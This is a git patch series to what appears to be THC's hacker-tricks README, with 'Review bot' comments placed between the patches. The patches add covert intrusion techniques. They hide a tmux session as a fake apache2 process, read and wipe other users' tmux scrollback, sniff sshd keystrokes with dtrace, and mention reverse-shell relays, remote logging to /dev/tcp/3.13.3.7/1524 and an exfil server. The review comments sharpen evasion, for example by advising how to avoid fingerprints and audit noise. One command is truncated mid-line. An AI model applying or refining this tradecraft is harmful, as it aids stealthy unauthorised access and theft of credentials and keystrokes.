From 873529d486268a5efac97b227dca145919e4e658 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 23 Nov 2023 09:52:38 +0000 Subject: [PATCH 01/12] Update README.md --- README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/README.md b/README.md index 0171e34..2950f6d 100644 --- a/README.md +++ b/README.md @@ -502,6 +502,8 @@ socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 Using [segfault.net](https://thc.org/segfault.net) (free): ```sh +# Request a random public TCP port: +curl sf/port echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)" nc -vnlp $(cat /config/self/reverse_port) ``` @@ -512,6 +514,12 @@ Using [bore.pub](https://github.com/ekzhang/bore) (free): bore local 31337 --to bore.pub ``` +using [serveo.net](https://serveo.net) (free): +```sh +# Forward a random public TCP port to localhost:31337 +ssh -R 0:localhost:31337 serveo.net +``` + See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). From 4996d26fa389c256441c7625498acf111fd54d30 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 23 Nov 2023 17:08:28 +0000 Subject: [PATCH 02/12] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2950f6d..74086df 100644 --- a/README.md +++ b/README.md 
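Review bot: the new serveo.net entry opens with lowercase "using" while the segfault.net and bore.pub entries right above it use "Using"; capitalize it to match. The comment line should also tell the reader where the public port number comes from: with `-R 0:localhost:31337` the server chooses the listen port and reports it back to the client at connect time, so the port to hand out is the one serveo.net prints after login, not something the user picks. As with the bore.pub example, the relay terminates the public TCP side, so whatever comes back through the tunnel (a reverse shell, for instance) is visible to the relay operator in the clear; one sentence saying so would keep this entry in line with the "Other free services are limited to forward HTTPS only" caveat that follows.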
@@ -1724,7 +1724,7 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. -**9.ii Sniff all SHELL sessions with dtrace** +**9.ii Sniff all SHELL sessions with dtrace - FreeBSD** Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes. @@ -1744,7 +1744,7 @@ Start a dtrace and log to /tmp/.log: ``` -**9.iii Sniff all SHELL sessions with eBPF** +**9.iii Sniff all SHELL sessions with eBPF - Linux** eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux. From 1bea742410d05dd7cb97dd17225dede414304c77 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 19:12:44 +0000 Subject: [PATCH 03/12] Update README.md --- README.md | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 74086df..cc0e9c0 100644 --- a/README.md +++ b/README.md 
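Review bot: the renamed 9.ii heading now says "- FreeBSD", but the paragraph directly under it still says "Especially useful for Solaris/SunOS and FreeBSD (pfSense)", so the heading undersells where the dtrace script applies; either make it "dtrace - FreeBSD/Solaris" or trim the body to match the heading. While in this region, the unchanged context line just above the first hunk reads "hide the the arguments" (doubled "the").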
@@ -2034,14 +2034,16 @@ Mindmaps & Knowledge 1. https://github.com/ibraheemdev/modern-unix -**12.iii. tmux** +**12.iii. Tmux Cheat Sheet** + | | Tmux Cheat Sheet | | --- | --- | -| Save Scrollback | ```Ctrl+b``` + ```:```, then type ```capture-pane -S -``` followed by ```Ctrl+b``` + ```:``` and type ```save-buffer filename.txt```. | -| Attach | Start a new tmux, then type ```Ctrl+b``` + ```s``` and use ```LEFT```, ```RIGHT``` to expand and select any session. | -| Logging | ```Ctrl+b``` + ```Shift + P``` to start and stop. | -| Menu | ```Ctrl+b``` + ```>```. Then use ```Ctrl+b``` + ```UP```, ```DOWN```, ```LEFT``` or ```RIGHT``` to move between the panes. | +| Save Scrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. | +| Spy Scrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | +| Logging | `Ctrl+b` + `Shift + P` to start and stop. | +| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. | +| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. | **12.iv. Useful commands** From 39d5f5263cc76f832018da58f4dcdc6675a53223 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 19:13:05 +0000 Subject: [PATCH 04/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index cc0e9c0..5f8d20a 100644 --- a/README.md +++ b/README.md @@ -100,7 +100,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Miscellaneous](#misc) 1. [Tools of the trade](#tools) 1. [Cool Linux commands](#cool-linux-commands) - 1. [tmux](#tmux) + 1. [tmux Cheat Sheet](#tmux) 1. [Useful commands](#useful-commands) 1. [Other Sites](#others) 
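Review bot: the SpyScrollback row describes `-t 6.0` as "pane 6, window 0", but tmux's target-pane syntax is a window target followed by a period and the pane index, so `6.0` selects window 6, pane 0; swap the wording, or use the unambiguous `session:window.pane` form (for example `-t 0:6.0`) so readers do not capture the wrong pane. It is also worth stating in the row that the command is run from any shell of the same user, outside the tmux being captured, since that is what makes it a "spy" rather than a save.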
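Review bot: the TOC entry becomes "tmux Cheat Sheet" while the heading it points at (patch 03) is "12.iii. Tmux Cheat Sheet"; pick one capitalization for both. The link target stays `#tmux`, which only keeps working if the page still carries an explicit `tmux` anchor next to the renamed heading, because GitHub's auto-generated id for the new heading text will no longer be `tmux`.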
From fe57305a0c1ae8c55445c7afa0ec09909962d9d4 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 19:15:26 +0000 Subject: [PATCH 05/12] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5f8d20a..8e5fce7 100644 --- a/README.md +++ b/README.md @@ -2039,8 +2039,8 @@ Mindmaps & Knowledge | | Tmux Cheat Sheet | | --- | --- | -| Save Scrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. | -| Spy Scrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | +| SaveScrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. | +| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | | Logging | `Ctrl+b` + `Shift + P` to start and stop. | | Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. | | Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. | From 96f6e7da7100a15244dd0f037dfd392b8b1e1ff1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 19:33:04 +0000 Subject: [PATCH 06/12] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 8e5fce7..b914e60 100644 --- a/README.md +++ b/README.md 
@@ -2041,6 +2041,7 @@ Mindmaps & Knowledge | --- | --- | | SaveScrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. | | SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | +| Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. | | Logging | `Ctrl+b` + `Shift + P` to start and stop. | | Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. | | Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. | From c2c5a744f9661f620c091ab1e39106874703247a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 21:30:52 +0000 Subject: [PATCH 07/12] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index b914e60..ab57fa0 100644 --- a/README.md +++ b/README.md @@ -2043,6 +2043,7 @@ Mindmaps & Knowledge | SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | | Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. | | Logging | `Ctrl+b` + `Shift + P` to start and stop. | +| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && tmux -S .$'\t'cache a` | | Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. | | Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. | From 1668828b9b92d5a82f8b393be30fe27c5c90b828 Mon Sep 17 00:00:00 2001 
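Review bot: in the Clear row the `-t6.0` target is passed only to `clear-history`, so `send-keys -R C-l` goes to the current pane rather than the pane whose history is being wiped; give the target to both commands (`tmux send-keys -t 6.0 -R C-l \; clear-history -t 6.0`). The description should also say that `-R` resets the pane's terminal state, not merely clears the screen, since that is the reason it is there.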
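Review bot: `zapper` is used in the HiddenTmux row without any introduction or link, unlike the `zap-args` reference in 9.i; link it the way the other tool mentions on the page do. The attach command in this row, `tmux -S .$'\t'cache a`, runs without zapper, so the attaching client's argv (tab-containing socket path included) shows up in `ps` even though the server's is masked; patch 08 fixes that, but the row should also say that the masquerade string `/usr/sbin/apache2 -k start` must be chosen per host, because a fake apache on a box that does not run apache stands out more than a plain tmux would.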
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 21:32:59 +0000 Subject: [PATCH 08/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ab57fa0..b46ddb0 100644 --- a/README.md +++ b/README.md @@ -2043,7 +2043,7 @@ Mindmaps & Knowledge | SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | | Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. | | Logging | `Ctrl+b` + `Shift + P` to start and stop. | -| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && tmux -S .$'\t'cache a` | +| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache attach` | | Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. | | Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. | From 4f5280c300a7378509718874c88da3627d4d74fd Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 6 Dec 2023 21:34:17 +0000 Subject: [PATCH 09/12] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index b46ddb0..9036e42 100644 --- a/README.md +++ b/README.md 
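Review bot: wrapping the attach in zapper closes the client-side argv leak, but argv masking does not hide the socket: `.\tcache` is an ordinary directory entry in /dev/shm, so `ls -la /dev/shm` (or a listing of unix sockets) still reveals it; the row should say that the masking is one layer and the socket file is the remaining artifact to think about.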
@@ -2043,7 +2043,7 @@ Mindmaps & Knowledge | SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. | | Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. | | Logging | `Ctrl+b` + `Shift + P` to start and stop. | -| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache attach` | +| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`
To attach to your session do
`cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache attach` | | Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. | | Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. | From 9ac2af6aaf385394e344c8a6d5fc2268b1dc094c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 7 Dec 2023 10:10:07 +0000 Subject: [PATCH 10/12] Update README.md --- README.md | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 9036e42..7f442f8 100644 --- a/README.md +++ b/README.md @@ -21,6 +21,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Execute in parrallel with separate logfiles](#parallel) 1. [SSH](#ssh) 1. [Almost invisible SSH](#ssh-invisible) + 1. [Multiple shells via 1 SSH/TCP connection](#ssh-master) 1. [SSH tunnel](#ssh-tunnel) 1. [SSH socks5 tunnel](#ssh-socks-tunnel) 1. [SSH to NATed host](#ssh-j) @@ -334,8 +335,26 @@ thcssh() } ``` + +**2.ii Multiple shells via 1 SSH/TCP connection** + +Have one TCP connection to the target and allow multiple users to piggyback on the same TCP connection to open further shell sessions. + +Create a Master Connection: +```sh +ssh -M -S .sshmux user@server.org +``` + +Create further shell-sessions using the same (single) Master-TCP connection from above (no password/auth needed): +```sh +ssh -S .sshmux NONE +#ssh -S .sshmux NONE ls -al +#scp -o "ControlPath=.sshmux" NONE:/etc/passwd . +``` +Can be combined with [thcssh](#ssh-invisible) to hide from utmp. + -**2.ii SSH tunnel** +**2.iii SSH tunnel** We use this all the time to circumvent local firewalls and IP filtering: ```sh 
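Review bot: splitting the HiddenTmux cell across three lines breaks the table: a GitHub-flavoured markdown row must be a single line, so "To attach to your session do" and the attach command will render as loose text after a truncated table, and the Attach and Menu rows that share the line with the closing `|` will be mangled as well. Keep the cell on one line and use `<br>` for the visual break, or move the attach command into prose under the table.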
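Review bot: the intro to 2.ii says "allow multiple users to piggyback on the same TCP connection", but ssh creates the control socket `.sshmux` with owner-only permissions, so only processes running as the same uid (or root) can open further sessions through it; say "multiple shells" rather than "multiple users", or explain that the socket has to be shared deliberately. Two practical points belong next to the example: `.sshmux` is relative to the current directory, so every follow-up `ssh -S .sshmux NONE` and the `scp -o "ControlPath=.sshmux"` must be run from the same directory (an absolute path avoids the trap), and the master can be inspected and torn down with `ssh -S .sshmux -O check NONE` and `ssh -S .sshmux -O exit NONE`, which is worth showing because closing the master drops every piggybacked session at once.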
@@ -352,7 +371,7 @@ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network). -**2.iii SSH socks4/5 tunnel** +**2.iv SSH socks4/5 tunnel** OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server. @@ -370,7 +389,7 @@ ssh -g -R 1080 user@server.org The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to *any* computer on *any port* that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network). -**2.iv SSH to a host behind NAT** +**2.v SSH to a host behind NAT** [ssh-j.com](http://ssh-j.com) provides a great relay service: To access a host behind NAT/Firewall (via SSH). @@ -400,7 +419,7 @@ The ssh connection goes via ssh-j.com into the reverse tunnel to the host behind -**2.v SSH pivoting to multiple servers** +**2.vi SSH pivoting to multiple servers** SSH ProxyJump can save you a lot of time and hassle when working with remote servers. Let's assume the scenario: 
@@ -427,9 +446,9 @@ kali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135 > We use this as well to hide our IP address when logging into servers. -**2.vi SSHD as user land** +**2.vii SSHD as user land** -It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing): +It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing) or as a quick exfil-dump-server that runs as non-root: ```sh # On the server, as non-root user 'joe': mkdir -p ~/.ssh 2>/dev/null From 04efdf574e2fa39dcb9a7758b9b6c2c7d7cdbfab Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 8 Dec 2023 08:23:18 +0000 Subject: [PATCH 11/12] Update README.md --- README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.md b/README.md index 7f442f8..7fd218a 100644 --- a/README.md +++ b/README.md @@ -735,6 +735,11 @@ nmap -sCV -F -Pn --min-rate 10000 scanme.nmap.org nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org ``` +Using bash: +```shell +timeout 5 bash -c " **3.viii. Crack Password hashes** From 3f3b656c37bfec8e2d1c1572ca721f207c84f202 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 8 Dec 2023 12:30:37 +0000 Subject: [PATCH 12/12] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 7fd218a..0a4481f 100644 --- a/README.md +++ b/README.md 
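Review bot: the rewritten 2.vii sentence has two grammar slips, "start a SSHD server" should be "an SSHD server" and "forward TCP connection" should be plural "connections"; the new tail "or as a quick exfil-dump-server that runs as non-root" also repeats "non-root" from the start of the same sentence, so "or as a quick, unprivileged exfil-dump server" reads cleaner.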
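Review bot: the added shell block is incomplete as it appears in this patch: the fence is opened with ```shell and the command stops after `timeout 5 bash -c "`, with no closing quote and no closing fence, so as shown the following heading "**3.viii. Crack Password hashes**" would be swallowed into the code block. The diffstat counts 5 insertions while only 3 added lines are visible here, so verify that the full command and the closing fence made it into the commit, and add a one-line comment saying that `timeout 5` is there to cap a connect attempt that would otherwise hang.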
@@ -324,7 +324,7 @@ thcssh() { local ttyp echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m" - echo -e "PS1='"'{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m" + echo -e "PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m" ttyp=$(stty -g) stty raw -echo opost [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no" @@ -1418,7 +1418,7 @@ export TERM=xterm-256color reset stty rows 24 columns 120 # Pimp up your prompt -PS1='{THC} USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' +PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' ``` @@ -1757,7 +1757,7 @@ Copy this "D Script" to the target system to a file named `d`: #pragma D option quiet inline string NAME = "sshd"; syscall::write:entry -/(arg0 >= 7) && (arg2 <= 16) && (execname == NAME)/ +/(arg0 >= 5) && (arg2 <= 16) && (execname == NAME)/ { printf("%d: %s\n", pid, stringof(copyin(arg1, arg2))); } ```
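Review bot: dropping the `{THC}` tag from both prompts is the right opsec call (the string was a trivially grep-able fingerprint in screen logs and shell histories); while here, the prompt at line 1418 still runs `who`, `cut` and `ps` on every redraw, which spawns three processes each time Enter is pressed and is noisy under execve auditing, so a short caveat next to "Pimp up your prompt" that this is for convenience rather than for staying quiet would fit the rest of the section.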
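Review bot: lowering the fd predicate from `arg0 >= 7` to `arg0 >= 5` widens which sshd write() calls are captured, but the D script carries no comment explaining what the threshold stands for, so the next reader cannot tell whether 5 is a measured value for a particular sshd/privsep layout or a guess; add a comment stating that the low descriptors are sshd's stdio, listening and logging fds and that the session's pty side lands above them, and note that the number depends on sshd version and configuration, so it should be confirmed on the target (for example by listing a live session's sshd descriptors with `procstat -f` on FreeBSD) before trusting the capture. The `arg2 <= 16` clause deserves the same one-line comment (keystroke-sized writes only).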